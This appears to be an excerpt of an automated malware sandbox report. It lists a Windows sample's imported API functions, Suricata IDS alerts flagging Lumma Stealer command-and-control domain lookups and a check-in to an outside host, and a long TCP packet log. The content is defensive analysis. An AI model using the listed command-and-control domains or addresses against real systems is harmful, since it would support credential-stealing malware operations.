                                                                                                                                                                                                                                                KERNEL32.dllLocalFree, GetLastError, SetLastError, FormatMessageW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileTime, CloseHandle, CreateFileW, GetCurrentProcessId, CreateDirectoryW, RemoveDirectoryW, SetFileAttributesW, GetFileAttributesW, DeleteFileW, MoveFileW, FindClose, FindFirstFileW, FindNextFileW, GetVersionExW, GetModuleFileNameW, SetCurrentDirectoryW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, ExpandEnvironmentStringsW, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, GetTimeFormatW, GetDateFormatW, GetCurrentProcess, GetExitCodeProcess, WaitForSingleObject, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetNumberFormatW, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapReAlloc, HeapSize, SetStdHandle, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, SetEvent, ResetEvent, WaitForSingleObjectEx, CreateEventW, IsDebuggerPresent, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, RtlPcToFileHeader, RtlUnwindEx, EncodePointer, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage, GetOEMCP
                                                                                                                                                                                                                                                OLEAUT32.dllSysAllocString, SysFreeString, VariantClear
                                                                                                                                                                                                                                                gdiplus.dllGdipCloneImage, GdipAlloc, GdipDisposeImage, GdipCreateBitmapFromStream, GdipCreateHBITMAPFromBitmap, GdiplusStartup, GdiplusShutdown, GdipFree

                                                                                                                                                                                                                                                Possible Origin

                                                                                                                                                                                                                                                Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                                                                EnglishUnited States

                                                                                                                                                                                                                                                Network Behavior

                                                                                                                                                                                                                                                Suricata IDS Alerts

                                                                                                                                                                                                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                                                2024-10-03T16:09:17.295246+02002056078ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (racedsuitreow .shop)1192.168.2.6632301.1.1.153UDP
                                                                                                                                                                                                                                                2024-10-03T16:09:17.308396+02002056076ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (defenddsouneuw .shop)1192.168.2.6624241.1.1.153UDP
                                                                                                                                                                                                                                                2024-10-03T16:09:17.319367+02002056074ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (deallyharvenw .shop)1192.168.2.6494461.1.1.153UDP
                                                                                                                                                                                                                                                2024-10-03T16:09:17.330985+02002056072ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (priooozekw .shop)1192.168.2.6598741.1.1.153UDP
                                                                                                                                                                                                                                                2024-10-03T16:09:17.341243+02002056070ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (pumpkinkwquo .shop)1192.168.2.6515511.1.1.153UDP
                                                                                                                                                                                                                                                2024-10-03T16:09:17.352943+02002056068ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (abortinoiwiam .shop)1192.168.2.6593011.1.1.153UDP
                                                                                                                                                                                                                                                2024-10-03T16:09:17.363756+02002056064ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (surroundeocw .shop)1192.168.2.6598461.1.1.153UDP
                                                                                                                                                                                                                                                2024-10-03T16:09:17.375637+02002056066ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (covvercilverow .shop)1192.168.2.6591631.1.1.153UDP
                                                                                                                                                                                                                                                2024-10-03T16:09:19.961621+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.649707104.21.42.210443TCP
                                                                                                                                                                                                                                                2024-10-03T16:09:19.961621+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649707104.21.42.210443TCP

                                                                                                                                                                                                                                                Network Port Distribution

                                                                                                                                                                                                                                                TCP Packets

                                                                                                                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                Oct 3, 2024 16:08:54.825675011 CEST49674443192.168.2.6173.222.162.64
                                                                                                                                                                                                                                                Oct 3, 2024 16:08:54.825675011 CEST49673443192.168.2.6173.222.162.64
                                                                                                                                                                                                                                                Oct 3, 2024 16:08:55.153727055 CEST49672443192.168.2.6173.222.162.64
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:04.428811073 CEST49674443192.168.2.6173.222.162.64
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:04.428811073 CEST49673443192.168.2.6173.222.162.64
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:04.760724068 CEST49672443192.168.2.6173.222.162.64
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:06.400068998 CEST44349698173.222.162.64192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:06.400158882 CEST49698443192.168.2.6173.222.162.64
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:14.871521950 CEST49699443192.168.2.64.175.87.197
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:14.871567011 CEST443496994.175.87.197192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:14.871768951 CEST49699443192.168.2.64.175.87.197
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:14.873387098 CEST49699443192.168.2.64.175.87.197
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:14.873431921 CEST443496994.175.87.197192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:15.658822060 CEST443496994.175.87.197192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:15.658917904 CEST49699443192.168.2.64.175.87.197
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:15.661365986 CEST49699443192.168.2.64.175.87.197
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:15.661375046 CEST443496994.175.87.197192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:15.661685944 CEST443496994.175.87.197192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:15.714243889 CEST49699443192.168.2.64.175.87.197
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:16.235364914 CEST49699443192.168.2.64.175.87.197
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:16.275408030 CEST443496994.175.87.197192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:16.493839979 CEST443496994.175.87.197192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:16.493863106 CEST443496994.175.87.197192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:16.493870974 CEST443496994.175.87.197192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:16.493911028 CEST443496994.175.87.197192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:16.493931055 CEST49699443192.168.2.64.175.87.197
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:16.493944883 CEST443496994.175.87.197192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:16.493972063 CEST443496994.175.87.197192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:16.494005919 CEST443496994.175.87.197192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:16.494035959 CEST49699443192.168.2.64.175.87.197
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:16.494035959 CEST49699443192.168.2.64.175.87.197
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:16.494035959 CEST49699443192.168.2.64.175.87.197
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:16.494064093 CEST49699443192.168.2.64.175.87.197
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:16.494369030 CEST443496994.175.87.197192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:16.494427919 CEST49699443192.168.2.64.175.87.197
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:16.494436979 CEST443496994.175.87.197192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:16.494558096 CEST443496994.175.87.197192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:16.494606018 CEST49699443192.168.2.64.175.87.197
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:17.059627056 CEST49699443192.168.2.64.175.87.197
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:17.059663057 CEST443496994.175.87.197192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:17.059678078 CEST49699443192.168.2.64.175.87.197
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:17.059686899 CEST443496994.175.87.197192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:17.414846897 CEST49705443192.168.2.6104.102.49.254
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:17.414890051 CEST44349705104.102.49.254192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:17.414983988 CEST49705443192.168.2.6104.102.49.254
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:17.418160915 CEST49705443192.168.2.6104.102.49.254
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:17.418179989 CEST44349705104.102.49.254192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:18.089164019 CEST44349705104.102.49.254192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:18.089308023 CEST49705443192.168.2.6104.102.49.254
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:18.095769882 CEST49705443192.168.2.6104.102.49.254
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:18.095787048 CEST44349705104.102.49.254192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:18.096227884 CEST44349705104.102.49.254192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:18.144757032 CEST49705443192.168.2.6104.102.49.254
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:18.191406965 CEST44349705104.102.49.254192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:18.615830898 CEST44349705104.102.49.254192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:18.615860939 CEST44349705104.102.49.254192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:18.615900993 CEST44349705104.102.49.254192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:18.615916967 CEST49705443192.168.2.6104.102.49.254
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:18.615936995 CEST44349705104.102.49.254192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:18.615976095 CEST44349705104.102.49.254192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:18.615993977 CEST44349705104.102.49.254192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:18.616009951 CEST49705443192.168.2.6104.102.49.254
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:18.616009951 CEST49705443192.168.2.6104.102.49.254
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:18.616009951 CEST49705443192.168.2.6104.102.49.254
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:18.616041899 CEST49705443192.168.2.6104.102.49.254
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:18.616041899 CEST49705443192.168.2.6104.102.49.254
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:18.710803032 CEST44349705104.102.49.254192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:18.710825920 CEST44349705104.102.49.254192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:18.710890055 CEST49705443192.168.2.6104.102.49.254
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:18.710921049 CEST44349705104.102.49.254192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:18.710959911 CEST49705443192.168.2.6104.102.49.254
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:18.711072922 CEST49705443192.168.2.6104.102.49.254
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:18.716229916 CEST44349705104.102.49.254192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:18.716314077 CEST49705443192.168.2.6104.102.49.254
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:18.716322899 CEST44349705104.102.49.254192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:18.716346979 CEST44349705104.102.49.254192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:18.716375113 CEST49705443192.168.2.6104.102.49.254
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:18.716573000 CEST49705443192.168.2.6104.102.49.254
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:18.719237089 CEST49705443192.168.2.6104.102.49.254
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:18.719253063 CEST44349705104.102.49.254192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:18.719289064 CEST49705443192.168.2.6104.102.49.254
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:18.719296932 CEST44349705104.102.49.254192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:18.742166042 CEST49707443192.168.2.6104.21.42.210
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:18.742245913 CEST44349707104.21.42.210192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:18.742327929 CEST49707443192.168.2.6104.21.42.210
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:18.746473074 CEST49707443192.168.2.6104.21.42.210
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:18.746515989 CEST44349707104.21.42.210192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:19.224025011 CEST44349707104.21.42.210192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:19.224194050 CEST49707443192.168.2.6104.21.42.210
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:19.227691889 CEST49707443192.168.2.6104.21.42.210
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:19.227715969 CEST44349707104.21.42.210192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:19.228132010 CEST44349707104.21.42.210192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:19.237915993 CEST49707443192.168.2.6104.21.42.210
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:19.237916946 CEST49707443192.168.2.6104.21.42.210
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:19.238099098 CEST44349707104.21.42.210192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:19.961688042 CEST44349707104.21.42.210192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:19.961905956 CEST44349707104.21.42.210192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:19.961977005 CEST49707443192.168.2.6104.21.42.210
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:20.029611111 CEST49707443192.168.2.6104.21.42.210
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:20.029691935 CEST44349707104.21.42.210192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:20.029737949 CEST49707443192.168.2.6104.21.42.210
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:20.029759884 CEST44349707104.21.42.210192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:20.262137890 CEST49708443192.168.2.6172.67.188.178
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:20.262176991 CEST44349708172.67.188.178192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:20.262228966 CEST49708443192.168.2.6172.67.188.178
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:20.266112089 CEST49708443192.168.2.6172.67.188.178
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:20.266129017 CEST44349708172.67.188.178192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:20.743350029 CEST44349708172.67.188.178192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:20.743875980 CEST49708443192.168.2.6172.67.188.178
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:20.743899107 CEST44349708172.67.188.178192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:20.745589018 CEST44349708172.67.188.178192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:20.745649099 CEST49708443192.168.2.6172.67.188.178
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:20.748811007 CEST49708443192.168.2.6172.67.188.178
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:20.748842955 CEST49708443192.168.2.6172.67.188.178
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:20.748898983 CEST44349708172.67.188.178192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:20.748907089 CEST49708443192.168.2.6172.67.188.178
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:20.748984098 CEST49708443192.168.2.6172.67.188.178
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:20.749188900 CEST49714443192.168.2.6172.67.188.178
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:20.749219894 CEST44349714172.67.188.178192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:20.749274015 CEST49714443192.168.2.6172.67.188.178
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:20.749449015 CEST49714443192.168.2.6172.67.188.178
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:20.749461889 CEST44349714172.67.188.178192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:21.211600065 CEST44349714172.67.188.178192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:21.211930990 CEST49714443192.168.2.6172.67.188.178
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:21.211946964 CEST44349714172.67.188.178192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:21.212934971 CEST44349714172.67.188.178192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:21.213015079 CEST49714443192.168.2.6172.67.188.178
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:21.213908911 CEST49714443192.168.2.6172.67.188.178
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:21.213977098 CEST44349714172.67.188.178192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:21.214112997 CEST49714443192.168.2.6172.67.188.178
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:21.259455919 CEST44349714172.67.188.178192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:21.261809111 CEST49714443192.168.2.6172.67.188.178
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:21.261836052 CEST44349714172.67.188.178192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:21.311403036 CEST49714443192.168.2.6172.67.188.178
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:21.597084999 CEST44349714172.67.188.178192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:21.597479105 CEST44349714172.67.188.178192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:21.597568035 CEST44349714172.67.188.178192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:21.597656012 CEST44349714172.67.188.178192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:21.597728968 CEST44349714172.67.188.178192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:21.597805023 CEST44349714172.67.188.178192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:21.597809076 CEST49714443192.168.2.6172.67.188.178
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:21.597809076 CEST49714443192.168.2.6172.67.188.178
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:21.597834110 CEST44349714172.67.188.178192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:21.597850084 CEST49714443192.168.2.6172.67.188.178
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:21.597978115 CEST44349714172.67.188.178192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:21.598115921 CEST49714443192.168.2.6172.67.188.178
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:21.598135948 CEST44349714172.67.188.178192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:21.598198891 CEST44349714172.67.188.178192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:21.598304033 CEST49714443192.168.2.6172.67.188.178
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:21.600091934 CEST49714443192.168.2.6172.67.188.178
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:21.600106001 CEST44349714172.67.188.178192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:21.627840996 CEST49715443192.168.2.6172.67.188.178
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:21.627888918 CEST44349715172.67.188.178192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:21.628062963 CEST49715443192.168.2.6172.67.188.178
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:21.628329039 CEST49715443192.168.2.6172.67.188.178
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:21.628375053 CEST44349715172.67.188.178192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:21.628519058 CEST49716443192.168.2.635.190.80.1
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:21.628602028 CEST4434971635.190.80.1192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:21.629128933 CEST49716443192.168.2.635.190.80.1
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:21.629277945 CEST49716443192.168.2.635.190.80.1
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:21.629309893 CEST4434971635.190.80.1192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:22.095546961 CEST4434971635.190.80.1192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:22.095820904 CEST49716443192.168.2.635.190.80.1
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:22.095885992 CEST4434971635.190.80.1192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:22.097353935 CEST4434971635.190.80.1192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:22.097419977 CEST49716443192.168.2.635.190.80.1
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:22.098587990 CEST49716443192.168.2.635.190.80.1
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:22.098743916 CEST49716443192.168.2.635.190.80.1
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:22.098756075 CEST4434971635.190.80.1192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:22.098838091 CEST4434971635.190.80.1192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:22.118340969 CEST44349715172.67.188.178192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:22.118676901 CEST49715443192.168.2.6172.67.188.178
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:22.118745089 CEST44349715172.67.188.178192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:22.122318029 CEST44349715172.67.188.178192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:22.122401953 CEST49715443192.168.2.6172.67.188.178
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:22.122725010 CEST49715443192.168.2.6172.67.188.178
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:22.122725010 CEST49715443192.168.2.6172.67.188.178
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:22.122770071 CEST49715443192.168.2.6172.67.188.178
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:22.122921944 CEST44349715172.67.188.178192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:22.122989893 CEST49717443192.168.2.6172.67.188.178
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:22.123024940 CEST49715443192.168.2.6172.67.188.178
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:22.123035908 CEST44349717172.67.188.178192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:22.123105049 CEST49717443192.168.2.6172.67.188.178
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:22.123332977 CEST49717443192.168.2.6172.67.188.178
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:22.123347998 CEST44349717172.67.188.178192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:22.153402090 CEST49716443192.168.2.635.190.80.1
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:22.153429031 CEST4434971635.190.80.1192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:22.199150085 CEST49716443192.168.2.635.190.80.1
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:22.229614019 CEST4434971635.190.80.1192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:22.229806900 CEST4434971635.190.80.1192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:22.229877949 CEST49716443192.168.2.635.190.80.1
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:22.231187105 CEST49716443192.168.2.635.190.80.1
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:22.231230021 CEST4434971635.190.80.1192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:22.232620955 CEST49718443192.168.2.635.190.80.1
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:22.232706070 CEST4434971835.190.80.1192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:22.232791901 CEST49718443192.168.2.635.190.80.1
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:22.232984066 CEST49718443192.168.2.635.190.80.1
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:22.233001947 CEST4434971835.190.80.1192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:22.589562893 CEST44349717172.67.188.178192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:22.590001106 CEST49717443192.168.2.6172.67.188.178
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:22.590018034 CEST44349717172.67.188.178192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:22.590475082 CEST44349717172.67.188.178192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:22.591029882 CEST49717443192.168.2.6172.67.188.178
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:22.591134071 CEST44349717172.67.188.178192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:22.591412067 CEST49717443192.168.2.6172.67.188.178
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:22.635407925 CEST44349717172.67.188.178192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:22.693650961 CEST4434971835.190.80.1192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:22.693926096 CEST49718443192.168.2.635.190.80.1
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:22.693989038 CEST4434971835.190.80.1192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:22.695122004 CEST4434971835.190.80.1192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:22.695581913 CEST49718443192.168.2.635.190.80.1
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:22.695732117 CEST49718443192.168.2.635.190.80.1
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:22.695744038 CEST4434971835.190.80.1192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:22.695766926 CEST4434971835.190.80.1192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:22.728677988 CEST44349717172.67.188.178192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:22.728792906 CEST44349717172.67.188.178192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:22.728844881 CEST44349717172.67.188.178192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:22.728888988 CEST49717443192.168.2.6172.67.188.178
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:22.728893042 CEST44349717172.67.188.178192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:22.728905916 CEST44349717172.67.188.178192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:22.728941917 CEST49717443192.168.2.6172.67.188.178
